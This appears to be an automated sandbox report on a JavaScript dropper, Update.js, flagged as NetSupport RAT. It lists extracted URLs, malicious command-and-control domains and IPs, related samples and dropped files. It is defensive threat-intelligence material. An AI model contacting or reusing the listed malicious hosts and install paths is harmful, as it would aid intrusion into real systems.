                                                http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1738259741.0000026C1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.pci.co.uk/supportclient32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drfalse
                                                    		unknown
                                                    https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.pwscript.exe, 00000000.00000003.1366341815.000001FC53AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1243375949.000001FC518D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.jsfalse
                                                      		unknown
                                                      https://www.google.com/intl/en-US/chrome/blank.htmlwscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355050587.000001FC57D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.jsfalse
                                                        		unknown
                                                        http://%s/testpage.htmwininet.dllpowershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.drfalse
                                                          		unknown
                                                          http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drfalse
                                                            		unknown
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://ggoryo.com/swscript.exe, 00000000.00000003.1346975876.000001FC57274000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://www.pci.co.uk/supportsupportclient32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drfalse
                                                                		unknown
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://ggoryo.com/trade/dawscript.exe, 00000000.00000003.1487288378.000001FC55788000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    		unknown
                                                                    https://go.micropowershell.exe, 00000008.00000002.1567156116.0000026C00F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://ocsp.thawte.com0powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://contoso.com/Licensepowershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://crl.micwscript.exe, 00000000.00000003.1346975876.000001FC5729F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://geo.netsupportsoftware.com/location/loca.aspwsclient32.exe, 0000000A.00000003.1532975213.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://127.0.0.1RESUMEPRINTINGclient32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drfalse
                                                                          		unknown
                                                                          https://ggoryo.compowershell.exe, 00000008.00000002.1567156116.0000026C0139F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00229000.00000004.00000800.00020000.00000000.sdmptrue
                                                                            		unknown
                                                                            http://%s/testpage.htmpowershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.drfalse
                                                                              		unknown
                                                                              http://127.0.0.1client32.exe, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drfalse
                                                                                		unknown
                                                                                http://geo.netsupportsoftware.com/location/loca.aspweclient32.exe, 0000000A.00000003.1532975213.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1527325191.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1524166542.0000000000F30000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1821012459.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1540191948.0000000000F3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://www.symauth.com/cps0(powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://ggoryo.com/wscript.exe, 00000000.00000003.1346975876.000001FC57274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1346975876.000001FC5729F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    		unknown
                                                                                    https://ggoryo.com/trade/fix.php?6867EFwscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1567156116.0000026C018BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://%s/fakeurl.htmpowershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.drfalse
                                                                                          		unknown
                                                                                          http://crl.thawte.com/ThawteTimestampingCA.crl0powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe.8.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://www.symauth.com/rpa00powershell.exe, 00000008.00000002.1567156116.0000026C00BE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BF8000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.8.dr, PCICHEK.DLL.8.dr, pcicapi.dll.8.dr, HTCTL32.DLL.8.dr, TCCTL32.DLL.8.dr, PCICL32.DLL.8.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://contoso.com/powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1738259741.0000026C1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C01A34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://www.google.com/intl/en-US/chrome/blank.htmlXVNTwscript.exe, 00000000.00000003.1416060813.000001FC5443D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://www.netsupportschool.com/tutor-assistant.asp11(Lclient32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drfalse
                                                                                              		unknown
                                                                                              https://aka.ms/pscore68powershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://ggorxo.com/wscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1567156116.0000026C00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.drfalse
                                                                                                  		unknown
                                                                                                  https://www-googleapis-staging.sandbox.google.comwscript.exe, 00000000.00000003.1235146786.000001FC52487000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1388374479.000001FC55692000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1255625344.000001FC51AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1234062822.000001FC52877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236345430.000001FC53047000.00000004.00000020.00020000.00000000.sdmp, Update.jsfalse
                                                                                                    		unknown
                                                                                                    https://oneget.orgpowershell.exe, 00000008.00000002.1567156116.0000026C016AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://ggoryo.compowershell.exe, 00000008.00000002.1567156116.0000026C01667000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://ggoryo.com/0Xwscript.exe, 00000000.00000003.1347982626.000001FC4FC26000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown

                                                                                                        World Map of Contacted IPs

                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs

                                                                                                        Public IPs

                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        77.83.199.112
                                                                                                        		ggoryo.comLithuania
                                                                                                        		12679ASN-MOLMoscowRussiaRUtrue
                                                                                                        5.181.159.137
                                                                                                        		unknownMoldova Republic of
                                                                                                        		39798MIVOCLOUDMDtrue
                                                                                                        104.26.1.231
                                                                                                        		geo.netsupportsoftware.comUnited States
                                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                                        General Information

                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1529030
                                                                                                        Start date and time:2024-10-08 15:22:44 +02:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 8m 38s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:14
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:Update.js
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.rans.troj.expl.evad.winJS@6/28@2/3
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 57%
                                                                                                        • Number of executed functions: 139
                                                                                                        • Number of non-executed functions: 237
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .js

                                                                                                        Warnings

                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                        • VT rate limit hit for: Update.js

                                                                                                        Simulations

                                                                                                        Behavior and APIs

                                                                                                        TimeTypeDescription
                                                                                                        09:23:41API Interceptor45x Sleep call for process: powershell.exe modified
                                                                                                        09:24:17API Interceptor5298842x Sleep call for process: client32.exe modified

                                                                                                        Joe Sandbox View / Context

                                                                                                        IPs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        5.181.159.137update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                        • http://5.181.159.137/fakeurl.htm
                                                                                                        Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                        • http://5.181.159.137/fakeurl.htm
                                                                                                        104.26.1.231update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                                                                        upd_8707558.msixGet hashmaliciousNetSupport RATBrowse
                                                                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                                                                        Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                                                                        FakturaPDF.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                                                                        Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                                                                        Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                                                                        SAPConcur.msixGet hashmaliciousNetSupport RATBrowse
                                                                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                                                                        HQuxVxuLV.ps1Get hashmaliciousNetSupport RATBrowse
                                                                                                        • geo.netsupportsoftware.com/location/loca.asp
                                                                                                        Advanced Scanner.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                                        • geo.netsupportsoftware.com/location/loca.asp

                                                                                                        Domains

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        geo.netsupportsoftware.comupdate.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                        • 104.26.1.231
                                                                                                        qvoLvRpRbr.msiGet hashmaliciousNetSupport RATBrowse
                                                                                                        • 104.26.0.231
                                                                                                        EMX97rT0GX.msiGet hashmaliciousNetSupport RATBrowse
                                                                                                        • 104.26.0.231
                                                                                                        Support_auto.msiGet hashmaliciousNetSupport RATBrowse
                                                                                                        • 104.26.0.231
                                                                                                        SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                        • 104.26.0.231
                                                                                                        SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                        • 172.67.68.212
                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                        • 104.26.1.231
                                                                                                        SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                        • 172.67.68.212
                                                                                                        SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                        • 172.67.68.212
                                                                                                        SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                                                                                                        • 104.26.0.231

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        ASN-MOLMoscowRussiaRUyq5xNPpWCT.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                                                                        • 80.64.217.93
                                                                                                        Form_Ver-00-26-49.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                        • 77.83.196.180
                                                                                                        vpn.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                        • 77.83.196.180
                                                                                                        SecuriteInfo.com.FileRepMalware.3625.5069.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                        • 77.83.196.180
                                                                                                        Form_Ver-14-00-21 (1).jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                        • 77.83.196.180
                                                                                                        http://85.208.108.63/BST.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                        • 77.83.196.180
                                                                                                        Form_Ver-13-59-03 (1).jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                        • 77.83.196.180
                                                                                                        https://firebasestorage.googleapis.com/v0/b/namo-426715.appspot.com/o/PqA45bE7me%2FForm_Ver-11-58-52.js?alt=media&token=dc88189e-81de-49e9-879e-365bc76e3567Get hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                        • 77.83.196.180
                                                                                                        Form_Ver-18-13-38.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                        • 77.83.196.180
                                                                                                        https://09358.princessandareilparrotsaviaries.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 192.101.68.115
                                                                                                        MIVOCLOUDMDlK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                                                                                                        • 5.252.177.228
                                                                                                        lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                                                                                                        • 5.252.177.228
                                                                                                        update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                        • 5.181.159.137
                                                                                                        MRSPBASd65554AB.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                        • 94.158.245.136
                                                                                                        MRSPBASd65554AB.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                        • 94.158.245.136
                                                                                                        Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                        • 5.181.159.137
                                                                                                        ZWlwrTM9HK.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 5.181.156.117
                                                                                                        Gez0dmj6yl.exeGet hashmaliciousDCRatBrowse
                                                                                                        • 94.158.244.70
                                                                                                        update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                        • 5.181.159.28
                                                                                                        17E503AEF3804C0513838FB4AE3E00F323B1260BF753D99DBF0AE415BA54DE11.exeGet hashmaliciousBdaejec, RaccoonBrowse
                                                                                                        • 194.180.191.241
                                                                                                        CLOUDFLARENETUSRemittance_Raveis.htmGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.96.3
                                                                                                        osjCeEFNrF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                        • 104.26.13.205
                                                                                                        LYqMgahOY0.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 172.67.74.152
                                                                                                        Iw7mPc6fCG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.26.12.205
                                                                                                        UyvVIyj7Ga.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 162.159.136.232
                                                                                                        Request for Quotation Plug Valve.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.96.3
                                                                                                        3g833ZIrnA.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.97.3
                                                                                                        https://support.squarespacrenewel.retroestyle.com/?DTYUI0=RTDM45Get hashmaliciousUnknownBrowse
                                                                                                        • 104.17.25.14
                                                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                        • 104.21.53.8
                                                                                                        vD6qU34v9S.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.26.13.205

                                                                                                        JA3 Fingerprints

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eosjCeEFNrF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                        • 77.83.199.112
                                                                                                        LYqMgahOY0.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 77.83.199.112
                                                                                                        Iw7mPc6fCG.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 77.83.199.112
                                                                                                        Request for Quotation Plug Valve.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 77.83.199.112
                                                                                                        3g833ZIrnA.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 77.83.199.112
                                                                                                        vD6qU34v9S.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 77.83.199.112
                                                                                                        q6utlq83i0.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 77.83.199.112
                                                                                                        103_25IBOT242790502_725597355.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 77.83.199.112
                                                                                                        Halkbank_Ekstre_20240508_074644_755730.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 77.83.199.112
                                                                                                        PO-009 Compurent.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 77.83.199.112
                                                                                                        37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                                                                        • 77.83.199.112
                                                                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                        • 77.83.199.112
                                                                                                        Transferencia 10-7-2024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                        • 77.83.199.112
                                                                                                        ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                        • 77.83.199.112
                                                                                                        ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                        • 77.83.199.112
                                                                                                        Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 77.83.199.112
                                                                                                        7AeSqNv1rC.exeGet hashmaliciousMicroClip, VidarBrowse
                                                                                                        • 77.83.199.112
                                                                                                        VmRHSCaiyc.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                        • 77.83.199.112
                                                                                                        M13W1o3scc.exeGet hashmaliciousStealcBrowse
                                                                                                        • 77.83.199.112
                                                                                                        rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 77.83.199.112

                                                                                                        Dropped Files

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLLupdate.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                          Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                            update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                              updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                  Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                    updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                      Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                        Update_124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                          MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zipGet hashmaliciousNetSupport RATBrowse
                                                                                                                            C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLLupdate.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                              Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                  updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                    updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                      Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                        updates.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                          Update 124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                            Update_124.0.6367.158.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                              MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zipGet hashmaliciousNetSupport RATBrowse

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\loca[1].htm

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):16
                                                                                                                                                Entropy (8bit):3.077819531114783
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:llD:b
                                                                                                                                                MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                                                                                                SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                                                                                                SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                                                                                                SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview:40.7357,-74.1724

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
